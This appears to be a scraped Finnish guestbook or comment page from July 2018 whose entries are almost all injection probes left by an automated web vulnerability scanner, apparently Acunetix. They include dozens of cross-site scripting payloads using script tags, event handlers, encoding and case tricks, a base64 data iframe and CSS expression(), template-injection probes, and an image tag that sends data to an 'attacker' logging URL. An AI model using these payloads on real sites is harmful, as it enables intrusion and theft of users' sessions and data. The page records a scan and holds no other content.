Nimi: e}body{acu:Expre/**/SSion(V7SM(9403))}

1

29.07.2018, 18:53

e

Nimi: e_xIFzG V7SM(9476)

1

29.07.2018, 18:53

e

Nimi: eMCLPE[!+!]

1

29.07.2018, 18:53

e'"()&%V7SM(9911)

Nimi: e

1

29.07.2018, 18:53

'"()&%V7SM(9140)

Nimi: e

1

29.07.2018, 18:53

e_9132

Nimi: e

1

29.07.2018, 18:53

acu9441<s1﹥s2ʺs3ʹuca9441

Nimi: e

1

29.07.2018, 18:53

{{9999862*9999294}}

Nimi: e

1

29.07.2018, 18:54

eV7SM(9788)

Nimi: e

1

29.07.2018, 18:54

eIQIWE[!+!]

Nimi: e

1

29.07.2018, 18:54

eV7SM(9335)

Nimi: e

1

29.07.2018, 18:54

eV7SM(9682)

Nimi: e

1

29.07.2018, 18:54

eV7SM(9184)

Nimi: e

1

29.07.2018, 18:54

eV7SM(9526)

Nimi: e

1

29.07.2018, 18:54

%65%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289114%29%3C%2F%73%43%72%69%70%54%3E

Nimi: e

1

29.07.2018, 18:54

e\u003CScRiPt\V7SM(9001)\u003C/sCripT\u003E

Nimi: e

1

29.07.2018, 18:54

e&lt;ScRiPt&gt;V7SM(9284)&lt;/sCripT&gt;

Nimi: e

1

29.07.2018, 18:54

e}body{acu:Expre/**/SSion(V7SM(9672))}

Nimi: e

1

29.07.2018, 18:54

e_wtfLb V7SM(9866)

Nimi: e

1

29.07.2018, 18:54

eJUSTM[!+!]

Nimi: e

1

29.07.2018, 18:54

e

Nimi: e

1'"()&%<acx><ScRiPt >V7SM(9927)</ScRiPt>

29.07.2018, 18:55

e

Nimi: e

'"()&%<acx><ScRiPt >V7SM(9208)</ScRiPt>

29.07.2018, 18:55

e

Nimi: e

1_9056

29.07.2018, 18:55

e

Nimi: e

acu9982<s1﹥s2ʺs3ʹuca9982

29.07.2018, 18:55

e

Nimi: e

{{9999099*10000284}}

29.07.2018, 18:55

e

Nimi: e

1<ScRiPt >V7SM(9189)</ScRiPt>

29.07.2018, 18:55

e

Nimi: e

1<WVBCYU>XNK3K[!+!]</WVBCYU>

29.07.2018, 18:55

e

Nimi: e

1<script>V7SM(9318)</script>

29.07.2018, 18:55

e

Nimi: e

1<ScR<ScRiPt>IpT>V7SM(9688)</sCr<ScRiPt>IpT>

29.07.2018, 18:55

e

Nimi: e

1<ScRiPt
>V7SM(9360)</ScRiPt>

29.07.2018, 18:55

e

Nimi: e

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9494></ScRiPt>

29.07.2018, 18:55

e

Nimi: e

1<video><source onerror="javascript:V7SM(9175)">

29.07.2018, 18:55

e

Nimi: e

1<isindex type=image src=1 onerror=V7SM(9754)>

29.07.2018, 18:55

e

Nimi: e

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9633'>

29.07.2018, 18:55

e

Nimi: e

1<body onload=V7SM(9569)>

29.07.2018, 18:55

e

Nimi: e

1<img src=//testasp.vulnweb.com/t/dot.gif onload=V7SM(9082)>

29.07.2018, 18:55

e

Nimi: e

1<img src=xyz OnErRor=V7SM(9651)>

29.07.2018, 18:55

e

Nimi: e

1<img/src=">" onerror=alert(9994)>

29.07.2018, 18:55

e

Nimi: e

%31%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289741%29%3C%2F%73%43%72%69%70%54%3E

29.07.2018, 18:55

e

Nimi: e

1\u003CScRiPt\V7SM(9639)\u003C/sCripT\u003E

29.07.2018, 18:55

e

Nimi: e

1&lt;ScRiPt&gt;V7SM(9225)&lt;/sCripT&gt;

29.07.2018, 18:55

e

Nimi: e

1<input autofocus onfocus=V7SM(9265)>

29.07.2018, 18:55

e

Nimi: e

1<img<!-- --> src=x onerror=alert(9930);//><!-- -->

29.07.2018, 18:56

e

Nimi: e

1}body{acu:Expre/**/SSion(V7SM(9532))}

29.07.2018, 18:56

e

Nimi: e

1<% contenteditable onresize=V7SM(9516)>

29.07.2018, 18:56

e

Nimi: e

1_lj8RV
<ScRiPt >V7SM(9959)</ScRiPt>

29.07.2018, 18:56

e

Nimi: e

1<WPDQ0Y>WIPO3[!+!]</WPDQ0Y>

29.07.2018, 18:56

e

Nimi: e

1<ifRAme sRc=9549.com></IfRamE>

29.07.2018, 18:56

e

Nimi: e

1<Hduiky x=9952>

29.07.2018, 18:56

e

Nimi: e

1<img sRc='http://attacker-9277/log.php?

29.07.2018, 18:56

e

Nimi: e'"()&%V7SM(9457)

1

29.07.2018, 18:56

e

Nimi: '"()&%V7SM(9061)

1

29.07.2018, 18:56

e

Nimi: e_9726

1

29.07.2018, 18:56

e

Nimi: acu4776<s1﹥s2ʺs3ʹuca4776

1

29.07.2018, 18:56

e

Nimi: {{10000239*9999679}}

1

29.07.2018, 18:56

e

Nimi: eV7SM(9866)

1

29.07.2018, 18:56

e

Nimi: eUZXEI[!+!]

1

29.07.2018, 18:56

e

Nimi: eV7SM(9798)

1

29.07.2018, 18:56

e

Nimi: eV7SM(9093)

1

29.07.2018, 18:56

e

Nimi: eV7SM(9380)

1

29.07.2018, 18:56

e

Nimi: eV7SM(9674)

1

29.07.2018, 18:56

e

Nimi: %65%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289072%29%3C%2F%73%43%72%69%70%54%3E

1

29.07.2018, 18:57

e

Nimi: e\u003CScRiPt\V7SM(9822)\u003C/sCripT\u003E

1

29.07.2018, 18:57

e

Nimi: e&lt;ScRiPt&gt;V7SM(9410)&lt;/sCripT&gt;

1

29.07.2018, 18:57

e

Nimi: e}body{acu:Expre/**/SSion(V7SM(9393))}

1

29.07.2018, 18:57

e

Nimi: e_7Ug9Z V7SM(9413)

1

29.07.2018, 18:57

e

Nimi: eZFKSK[!+!]

1

29.07.2018, 18:57

e'"()&%V7SM(9694)

Nimi: e

1

29.07.2018, 18:57

'"()&%V7SM(9935)

Nimi: e

1

29.07.2018, 18:57

e_9948

Nimi: e

1

29.07.2018, 18:57

acu1213<s1﹥s2ʺs3ʹuca1213

Nimi: e

1

29.07.2018, 18:57

{{9999268*9999498}}

Nimi: e

1

29.07.2018, 18:57

eV7SM(9541)

Nimi: e

1

29.07.2018, 18:57

eFALCP[!+!]

Nimi: e

1

29.07.2018, 18:57

eV7SM(9552)

Nimi: e

1

29.07.2018, 18:57

eV7SM(9707)

Nimi: e

1

29.07.2018, 18:58

eV7SM(9256)

Nimi: e

1

29.07.2018, 18:58

eV7SM(9995)

Nimi: e

1

29.07.2018, 18:58

%65%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289458%29%3C%2F%73%43%72%69%70%54%3E

Nimi: e

1

29.07.2018, 18:58

e\u003CScRiPt\V7SM(9919)\u003C/sCripT\u003E

Nimi: e

1

29.07.2018, 18:58

e&lt;ScRiPt&gt;V7SM(9182)&lt;/sCripT&gt;

Nimi: e

1

29.07.2018, 18:58

e}body{acu:Expre/**/SSion(V7SM(9892))}

Nimi: e

1

29.07.2018, 18:58

e_IyJNR V7SM(9104)

Nimi: e

1

29.07.2018, 18:58

eQARQO[!+!]

Nimi: e

1

29.07.2018, 18:58

e

Nimi: e

1'"()&%<acx><ScRiPt >V7SM(9751)</ScRiPt>

29.07.2018, 19:07

e

Nimi: e

'"()&%<acx><ScRiPt >V7SM(9587)</ScRiPt>

29.07.2018, 19:07

e

Nimi: e

1_9015

29.07.2018, 19:07

e

Nimi: e

acu1442<s1﹥s2ʺs3ʹuca1442

29.07.2018, 19:07

e

Nimi: e

{{9999409*10000432}}

29.07.2018, 19:07

e

Nimi: e

1<ScRiPt >V7SM(9698)</ScRiPt>

29.07.2018, 19:08

e

Nimi: e

1<W8HE5S>DHVMW[!+!]</W8HE5S>

29.07.2018, 19:08

e

Nimi: e

1<script>V7SM(9706)</script>

29.07.2018, 19:08

e

Nimi: e

1<ScR<ScRiPt>IpT>V7SM(9376)</sCr<ScRiPt>IpT>

29.07.2018, 19:08

e

Nimi: e

1<ScRiPt
>V7SM(9078)</ScRiPt>

29.07.2018, 19:08

e

Nimi: e

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9409></ScRiPt>

29.07.2018, 19:08

e

Nimi: e

1<video><source onerror="javascript:V7SM(9528)">

29.07.2018, 19:08

e

Nimi: e

1<isindex type=image src=1 onerror=V7SM(9850)>

29.07.2018, 19:08

e

Nimi: e

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9907'>

29.07.2018, 19:08

e

Nimi: e

1<body onload=V7SM(9997)>

29.07.2018, 19:08

e

Nimi: e

1<img src=//testasp.vulnweb.com/t/dot.gif onload=V7SM(9164)>

29.07.2018, 19:08

e

Nimi: e

1<img src=xyz OnErRor=V7SM(9287)>

29.07.2018, 19:08

e

Nimi: e

1<img/src=">" onerror=alert(9214)>

29.07.2018, 19:08

e

Nimi: e

%31%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289848%29%3C%2F%73%43%72%69%70%54%3E

29.07.2018, 19:08

e

Nimi: e

1\u003CScRiPt\V7SM(9532)\u003C/sCripT\u003E

29.07.2018, 19:08

e

Nimi: e

1&lt;ScRiPt&gt;V7SM(9260)&lt;/sCripT&gt;

29.07.2018, 19:08

e

Nimi: e

1<input autofocus onfocus=V7SM(9278)>

29.07.2018, 19:08

e

Nimi: e

1<img<!-- --> src=x onerror=alert(9759);//><!-- -->

29.07.2018, 19:08

e

Nimi: e

1}body{acu:Expre/**/SSion(V7SM(9874))}

29.07.2018, 19:08

e

Nimi: e

1<% contenteditable onresize=V7SM(9303)>

29.07.2018, 19:08

e

Nimi: e

1_nHugf
<ScRiPt >V7SM(9169)</ScRiPt>

29.07.2018, 19:09

e

Nimi: e

1<WL2HSX>YWOYU[!+!]</WL2HSX>

29.07.2018, 19:09

e

Nimi: e

1<ifRAme sRc=9108.com></IfRamE>

29.07.2018, 19:09

e

Nimi: e

1<VIZ8ae x=9283>

29.07.2018, 19:09

e

Nimi: e

1<img sRc='http://attacker-9135/log.php?

29.07.2018, 19:09

e

Nimi: e'"()&%V7SM(9651)

1

29.07.2018, 19:09

e

Nimi: '"()&%V7SM(9042)

1

29.07.2018, 19:09

e

Nimi: e_9142

1

29.07.2018, 19:09

e

Nimi: acu7530<s1﹥s2ʺs3ʹuca7530

1

29.07.2018, 19:09

e

Nimi: {{10000483*9999289}}

1

29.07.2018, 19:09

e

Nimi: eV7SM(9173)

1

29.07.2018, 19:09

e

Nimi: e8ECI8[!+!]

1

29.07.2018, 19:09

e

Nimi: eV7SM(9631)

1

29.07.2018, 19:09

e

Nimi: eV7SM(9404)

1

29.07.2018, 19:09

e

Nimi: eV7SM(9723)

1

29.07.2018, 19:09

e

Nimi: eV7SM(9843)

1

29.07.2018, 19:09

e

Nimi: %65%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289401%29%3C%2F%73%43%72%69%70%54%3E

1

29.07.2018, 19:10

e

Nimi: e&lt;ScRiPt&gt;V7SM(9696)&lt;/sCripT&gt;

1

29.07.2018, 19:10

e

Nimi: e}body{acu:Expre/**/SSion(V7SM(9464))}

1

29.07.2018, 19:10

e

Nimi: e_Qdnd5 V7SM(9551)

1

29.07.2018, 19:10

e

Nimi: eDOVYI[!+!]

1

29.07.2018, 19:10

e'"()&%V7SM(9509)

Nimi: e

1

29.07.2018, 19:10

'"()&%V7SM(9616)

Nimi: e

1

29.07.2018, 19:10

e_9118

Nimi: e

1

29.07.2018, 19:10

acu7772<s1﹥s2ʺs3ʹuca7772

Nimi: e

1

29.07.2018, 19:10

{{9999436*9999734}}

Nimi: e

1

29.07.2018, 19:11

eV7SM(9994)

Nimi: e

1

29.07.2018, 19:11

eC8AQS[!+!]

Nimi: e

1

29.07.2018, 19:11

eV7SM(9830)

Nimi: e

1

29.07.2018, 19:11

eV7SM(9952)

Nimi: e

1

29.07.2018, 19:11

eV7SM(9840)

Nimi: e

1

29.07.2018, 19:11

eV7SM(9201)

Nimi: e

1

29.07.2018, 19:11

%65%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289670%29%3C%2F%73%43%72%69%70%54%3E

Nimi: e

1

29.07.2018, 19:11

e\u003CScRiPt\V7SM(9168)\u003C/sCripT\u003E

Nimi: e

1

29.07.2018, 19:11

e&lt;ScRiPt&gt;V7SM(9675)&lt;/sCripT&gt;

Nimi: e

1

29.07.2018, 19:11

e}body{acu:Expre/**/SSion(V7SM(9175))}

Nimi: e

1

29.07.2018, 19:12

e_gPWBx V7SM(9678)

Nimi: e

1

29.07.2018, 19:12

eAJYN6[!+!]

Nimi: e

1

29.07.2018, 19:12